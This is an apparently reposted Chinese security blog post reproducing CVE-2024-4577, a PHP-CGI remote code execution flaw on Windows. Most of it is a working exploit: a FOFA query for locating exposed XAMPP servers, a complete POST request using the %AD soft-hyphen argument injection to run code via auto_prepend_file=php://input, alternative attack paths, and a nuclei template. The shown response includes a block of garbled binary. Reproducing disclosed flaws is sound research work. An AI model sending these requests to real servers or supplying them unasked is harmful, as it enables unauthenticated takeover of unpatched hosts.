CVE-2024-4577 漏洞复现

admin 2024年6月13日14:00:50评论79 views字数 5426阅读18分5秒阅读模式

使

01

漏洞名称

PHP CGI Windows平台远程代码执行漏洞

02

漏洞影响

影响范围

    PHP 8.3 < 8.3.8
    PHP 8.2 < 8.2.20
    PHP 8.1 < 8.1.29

03

漏洞描述

PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当PHP运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过CVE-2012-1823 保护,从而可在无需登陆的情况下执行任意PHP代码。

2024年6月6日,PHP官方发布新版本正式修复该漏洞,漏洞利用较为简单且危害较大,建议尽快采取措施升级或者进行缓解。

04

FOFA搜索语句
header="Xampps_info" || body="/xampps.jpg" || (header="location http" && header="xampp") || body="content="Kai Oswald Seidler" || title="XAMPP for" || title="XAMPP Version" || body="font-size: 1.2em; color: red;">New XAMPP"

CVE-2024-4577 漏洞复现

05

漏洞复现

向靶场发送如下数据包

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.69Connection: closeContent-Length: 37Accept: */*Accept-Language: enAccept-Encoding: gzip<?php echo md5("CVE-2024-4577"); ?>

响应内容如下,包含了md5("CVE-2024-4577")的计算结果

CVE-2024-4577 漏洞复现

HTTP/1.1 200 OKConnection: closeContent-Type: text/htmlDate: Wed, 12 Jun 2024 07:28:45 GMTServer: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.4.19Vary: Accept-EncodingX-Powered-By: PHP/5.4.193f2ba4ab3b260f4c2dc61a6fac7c3e8aMZ����@��   �!�L�!This program cannot be run in DOS mode.$bN�&/j�&/j�&/j��`��//j�/W��"/j�/W��0/j�/W��$/j��� /j�/W��#/j�&/k��/j�/W��$/j�8}��'/j�/W��'/j�Rich&/j�PEL8R�       nN�u�@���@����x�@�@��`�@�d.text�ln `.rdata�-�.r@@.data���@�.rsrc@��@@.reloc$��@BV�t�FP���@�N��^�L$�%@�@�D$�HQht�@���@�3��������̋L�  ��D$��J��BQP���@��������������U��������jjj�D$������u�3��������������̃����@P�L$Q���@V�T$�@����]����̋D$Qht�@���@�3���������̋D��D$��:u��t�A:Buh@R�D$$��@Vj�D$h�@P�L�@�L$$Q�<�@��D�̋DSUVW�|$�؅�vO�-�@�������@r�@�0�@�� PVjW�Ճ���t�+�uԋD$_^][��P�@�D$+�_^][����������̡��@�T$��L��S�U�l$VW�|$����vVWj���Z��|�@�D���xS�T�@u���L���y1�q|�T���l$�D$�t$����(�@�����u�%P�@��V�t��tj�@X����u^�%P�@^Á���@3ĉ�$��y|����8tm������taPhx�@�L$(hQ��@���@�����T�����j P�,�@����t@P�$�@���D$���>��4������txj P�,�@�����tb���@���T�������+ȃ�|Ejh��@P���@����u0Uh��@�T$(hR��@EU���$�@�l$(���D$���l$�D$PU�Ԃ@���t6�5��@�xvjh��@Q�փ������T$RU� �@���uЋ��@��7�T���R|��@�d;�t����u��I��tQRh��@�D$,hP��@���Rh��@�L$(hQ��@����W�T$$VR�Ӄ��d$�F��ty��v,�jh��@Q���@����u8D$uW�V�WR�D$RP�!�N�WQR��Wjh��@�Ӄ��L$�D$PQ� �@������c���Wjh��@�Ӄ�[��$_^]3̸�[]����������̡��@�T$��L����P+��VW�|$3�;�r�ȋy+����v-S�$U�-x�@��+�P�Qj�Ճ���~�;�r�][_��^�_��^��������U�����Q���@�U��L����P+��S�]V�0W3�;�r�ȋY+����v����+�P�R��L���~�;�r���_^[��]���������̋D$P���@���̡��@�T$��L���V�t��t@�D$��W}����|��L����~ύ��|$WPQ��@ ���;��_��u��@��D$P�D�T�����U�lVW��t�ÍP@��u�+��3��L$�W�<�@������tDO��t'SUhЎ@WV��@V�t�@��U���@��_^]�Uh؎@WV��@V�t�@��U���@��_^]�����������D$܎@�%��@�̋jh���@ �܎@�0:����@P�D$$PWR����҃���t�D$$�L$VSPQW���@��_^[������̡@�@SU�-�@V�t$W�|$��D��������tu;�tq��8Xuj�P�Ճ���~^�8^v@�@��L��������H�N���@�F8^�F@�@���D�������tq;�tm��8XufQ�Ճ���~Z�8^vV���@����@�@��T�������P�V���P�V8^�FvQV�`�@��_^][�WV�x�@��=��@u�9����@��t���@��D���h@����W��_^][á�@��V�t$W�|$WV�ы�|�@�L����y�r���@���@��D$P��L���u��8���j@;�t1� h���@ ���@��7���h��@���@����;�tm�P@��u�+���tK�ÍP@��u�+��>�D$@P�|�@�VRSP�D$ �C`�D$ GW�UP�4`�|$@����=�|$�|$$�l$3��-;�t�É$�P��I@��u�+D$���@R����D$Ph��@j�҃�][��t�D$�L$�TWPQRh��@���@�������DP�T�@��_^����@��D���@(��u���@�D�P@��u�W+L$QP�T$R�D$���@���h��@j�у���t�T$�DWVRPh��@���@��_^����@��D��S���tOU�l$���@�����D��V��W�P@��u�+��NQ�<�@V��UW��^�f�7FVWj����OW�@�@�� _^][ËDPht�@�0�@��@P��@��[ËL$Qht�@�0�@��@P�

漏洞复现成功

POC路径有多个

/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

06

nuclei poc

nuclei 官方已发布poc,poc文件内容如下

id: CVE-2024-4577info:  name: PHP CGI - Argument Injection  author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch  severity: critical  description: |    PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.  impact: |    Successful exploitation could lead to remote code execution on the affected system.  remediation: |    Apply the vendor-supplied patches or upgrade to a non-vulnerable version.  metadata:    verified: true  tags: cve,cve2024,php,cgi,rcehttp:  - method: POST    path:      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"      - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"      - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"      - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"    body: |      <?php echo md5("CVE-2024-4577"); ?>    stop-at-first-match: true    matchers:      - type: word        part: body        words:          - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-4577 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月13日14:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-4577 漏洞复现http://cn-sec.com/archives/2842729.html

发表评论

匿名网友 填写信息